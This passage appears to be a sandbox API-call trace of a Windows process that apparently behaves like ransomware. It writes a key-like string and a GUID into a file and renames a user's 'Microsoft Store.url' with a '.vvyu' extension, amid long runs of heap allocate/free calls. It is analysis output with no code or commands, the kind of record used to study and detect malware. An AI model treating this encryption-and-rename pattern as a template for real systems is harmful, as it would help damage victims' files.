RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0193.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3e40 | out: hHeap=0x2c0000) returned 1 [0193.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.258] WriteFile (in: hFile=0x584, lpBuffer=0x2adfe08*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2adfe08*, lpNumberOfBytesWritten=0x2f9fb14*=0x81, lpOverlapped=0x0) returned 1 [0193.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.259] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.259] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.260] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.261] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.261] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.261] CloseHandle (hObject=0x584) returned 1 [0193.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0193.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.262] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url.vvyu")) returned 1 [0193.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.264] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0193.267] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0193.267] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0193.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0193.268] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0193.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.268] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0193.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0193.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0193.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.295] HeapFree (in: 